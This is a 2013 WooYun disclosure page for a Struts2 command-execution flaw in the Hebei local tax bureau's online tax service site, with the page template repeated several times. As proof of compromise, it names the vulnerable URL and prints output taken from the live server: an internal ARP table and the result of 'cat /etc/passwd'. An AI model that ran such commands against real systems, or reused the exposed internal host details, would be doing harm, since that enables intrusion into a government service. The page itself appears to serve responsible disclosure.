河北地税网上办税服务厅struts2漏洞 | wooyun-2013-038546| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-038546

漏洞标题：河北地税网上办税服务厅struts2漏洞

漏洞作者： hollies

提交时间：2013-09-30 08:58

修复时间：2013-11-14 08:58

公开时间：2013-11-14 08:58

漏洞类型：命令执行

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-09-30：细节已通知厂商并且等待厂商处理中
2013-10-03：厂商已经确认，细节仅向厂商公开
2013-10-13：细节向核心白帽子及相关领域专家公开
2013-10-23：细节向普通白帽子公开
2013-11-02：细节向实习白帽子公开
2013-11-14：细节向公众公开

简要描述：

详细说明：

http://bsfw.hebds.gov.cn/wbcms/ls/lsAction.do 获得目录dir:/oracle/middleware/user_projects/domains/bsfw_domain/applications/wbcms
dir:/oracle/middleware/user_projects/domains/bsfw_domain/applications/wbcms
? (192.189.200.6) at 0:11:25:be:52:cc [ethernet] stored in bucket 18
? (192.189.200.7) at 0:11:25:be:50:9e [ethernet] stored in bucket 19
? (192.189.200.15) at 0:11:25:be:59:ce [ethernet] stored in bucket 27
? (192.189.200.17) at 0:11:25:be:50:9b [ethernet] stored in bucket 29
? (192.189.200.21) at 0:12:d9:89:83:59 [ethernet] stored in bucket 33
? (192.189.200.31) at 0:14:c2:5f:4b:b1 [ethernet] stored in bucket 43
? (192.189.200.36) at 2:1f:a0:0:0:21 [ethernet] stored in bucket 48
? (192.189.200.47) at e4:1f:13:fa:80:fd [ethernet] stored in bucket 59
? (192.189.200.55) at 2:1f:a0:0:0:21 [ethernet] stored in bucket 67
? (192.189.200.56) at 0:1f:a0:1:c8:f [ethernet] stored in bucket 68
? (192.189.200.58) at 0:1f:a0:1:c7:33 [ethernet] stored in bucket 70
? (192.189.200.60) at 5c:f3:fc:94:67:24 [ethernet] stored in bucket 72
? (192.189.200.62) at 0:11:bc:ac:28:0 [ethernet] stored in bucket 74
bucket: 0 contains: 0 entries
bucket: 1 contains: 0 entries
bucket: 2 contains: 0 entries
bucket: 3 contains: 0 entries
bucket: 4 contains: 0 entries
bucket: 5 contains: 0 entries
bucket: 6 contains: 0 entries
bucket: 7 contains: 0 entries
bucket: 8 contains: 0 entries
bucket: 9 contains: 0 entries
bucket: 10 contains: 0 entries
bucket: 11 contains: 0 entries
bucket: 12 contains: 0 entries
bucket: 13 contains: 0 entries
bucket: 14 contains: 0 entries
bucket: 15 contains: 0 entries
bucket: 16 contains: 0 entries
bucket: 17 contains: 0 entries
bucket: 18 contains: 1 entries
bucket: 19 contains: 1 entries
bucket: 20 contains: 0 entries
bucket: 21 contains: 0 entries
bucket: 22 contains: 0 entries
bucket: 23 contains: 0 entries
bucket: 24 contains: 0 entries
bucket: 25 contains: 0 entries
bucket: 26 contains: 0 entries
bucket: 27 contains: 1 entries
bucket: 28 contains: 0 entries
bucket: 29 contains: 1 entries
bucket: 30 contains: 0 entries
bucket: 31 contains: 0 entries
bucket: 32 contains: 0 entries
bucket: 33 contains: 1 entries
bucket: 34 contains: 0 entries
bucket: 35 contains: 0 entries
bucket: 36 contains: 0 entries
bucket: 37 contains: 0 entries
bucket: 38 contains: 0 entries
bucket: 39 contains: 0 entries
bucket: 40 contains: 0 entries
bucket: 41 contains: 0 entries
bucket: 42 contains: 0 entries
bucket: 43 contains: 1 entries
bucket: 44 contains: 0 entries
bucket: 45 contains: 0 entries
bucket: 46 contains: 0 entries
bucket: 47 contains: 0 entries
bucket: 48 contains: 1 entries
bucket: 49 contains: 0 entries
bucket: 50 contains: 0 entries
bucket: 51 contains: 0 entries
bucket: 52 contains: 0 entries
bucket: 53 contains: 0 entries
bucket: 54 contains: 0 entries
bucket: 55 contains: 0 entries
bucket: 56 contains: 0 entries
bucket: 57 contains: 0 entries
bucket: 58 contains: 0 entries
bucket: 59 contains: 1 entries
bucket: 60 contains: 0 entries
bucket: 61 contains: 0 entries
bucket: 62 contains: 0 entries
bucket: 63 contains: 0 entries
bucket: 64 contains: 0 entries
bucket: 65 contains: 0 entries
bucket: 66 contains: 0 entries
bucket: 67 contains: 1 entries
bucket: 68 contains: 1 entries
bucket: 69 contains: 0 entries
bucket: 70 contains: 1 entries
bucket: 71 contains: 0 entries
bucket: 72 contains: 1 entries
bucket: 73 contains: 0 entries
bucket: 74 contains: 1 entries
bucket: 75 contains: 0 entries
bucket: 76 contains: 0 entries
bucket: 77 contains: 0 entries
bucket: 78 contains: 0 entries
bucket: 79 contains: 0 entries
bucket: 80 contains: 0 entries
bucket: 81 contains: 0 entries
bucket: 82 contains: 0 entries
bucket: 83 contains: 0 entries
bucket: 84 contains: 0 entries
bucket: 85 contains: 0 entries
bucket: 86 contains: 0 entries
bucket: 87 contains: 0 entries
bucket: 88 contains: 0 entries
bucket: 89 contains: 0 entries
bucket: 90 contains: 0 entries
bucket: 91 contains: 0 entries
bucket: 92 contains: 0 entries
bucket: 93 contains: 0 entries
bucket: 94 contains: 0 entries
bucket: 95 contains: 0 entries
bucket: 96 contains: 0 entries
bucket: 97 contains: 0 entries
bucket: 98 contains: 0 entries
bucket: 99 contains: 0 entries
bucket: 100 contains: 0 entries
bucket: 101 contains: 0 entries
bucket: 102 contains: 0 entries
bucket: 103 contains: 0 entries
bucket: 104 contains: 0 entries
bucket: 105 contains: 0 entries
bucket: 106 contains: 0 entries
bucket: 107 contains: 0 entries
bucket: 108 contains: 0 entries
bucket: 109 contains: 0 entries
bucket: 110 contains: 0 entries
bucket: 111 contains: 0 entries
bucket: 112 contains: 0 entries
bucket: 113 contains: 0 entries
bucket: 114 contains: 0 entries
bucket: 115 contains: 0 entries
bucket: 116 contains: 0 entries
bucket: 117 contains: 0 entries
bucket: 118 contains: 0 entries
bucket: 119 contains: 0 entries
bucket: 120 contains: 0 entries
bucket: 121 contains: 0 entries
bucket: 122 contains: 0 entries
bucket: 123 contains: 0 entries
bucket: 124 contains: 0 entries
bucket: 125 contains: 0 entries
bucket: 126 contains: 0 entries
bucket: 127 contains: 0 entries
bucket: 128 contains: 0 entries
bucket: 129 contains: 0 entries
bucket: 130 contains: 0 entries
bucket: 131 contains: 0 entries
bucket: 132 contains: 0 entries
bucket: 133 contains: 0 entries
bucket: 134 contains: 0 entries
bucket: 135 contains: 0 entries
bucket: 136 contains: 0 entries
bucket: 137 contains: 0 entries
bucket: 138 contains: 0 entries
bucket: 139 contains: 0 entries
bucket: 140 contains: 0 entries
bucket: 141 contains: 0 entries
bucket: 142 contains: 0 entries
bucket: 143 contains: 0 entries
bucket: 144 contains: 0 entries
bucket: 145 contains: 0 entries
bucket: 146 contains: 0 entries
bucket: 147 contains: 0 entries
bucket: 148 contains: 0 entries
There are 13 entries in the arp table.

漏洞证明：

cat /etc/passwd
root:!:0:0::/:/usr/bin/ksh
daemon:!:1:1::/etc:
bin:!:2:2::/bin:
sys:!:3:3::/usr/sys:
adm:!:4:4::/var/adm:
uucp:!:5:5::/usr/lib/uucp:
guest:!:100:100::/home/guest:
nobody:!:4294967294:4294967294::/:
lpd:!:9:4294967294::/:
lp:*:11:11::/var/spool/lp:/bin/false
invscout:*:6:12::/var/adm/invscout:/usr/bin/ksh
snapp:*:200:13:snapp login user:/usr/sbin/snapp:/usr/sbin/snappd
ipsec:*:201:1::/etc/ipsec:/usr/bin/ksh
nuucp:*:7:5:uucp login user:/var/spool/uucppublic:/usr/sbin/uucp/uucico
pconsole:*:8:0::/var/adm/pconsole:/usr/bin/ksh
esaadmin:*:10:0::/var/esa:/usr/bin/ksh
weblogic:!:204:202::/oracle/middleware:/usr/bin/ksh
sshd:*:205:203::/var/empty:/usr/bin/ksh
alphasta:!:206:1::/home/alphasta:/usr/bin/ksh

修复方案：

升级struts2漏洞

版权声明：转载请注明来源 hollies@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：6

确认时间：2013-10-03 01:19

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-038546

漏洞标题：河北地税网上办税服务厅struts2漏洞

相关厂商：bsfw.hebds.gov.cn

漏洞作者： hollies

提交时间：2013-09-30 08:58

修复时间：2013-11-14 08:58

公开时间：2013-11-14 08:58

漏洞类型：命令执行

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 hollies@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-038546

漏洞标题：河北地税网上办税服务厅struts2漏洞

相关厂商：bsfw.hebds.gov.cn

漏洞作者： hollies

提交时间：2013-09-30 08:58

修复时间：2013-11-14 08:58

公开时间：2013-11-14 08:58

漏洞类型：命令执行

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2013-038546"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 hollies@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：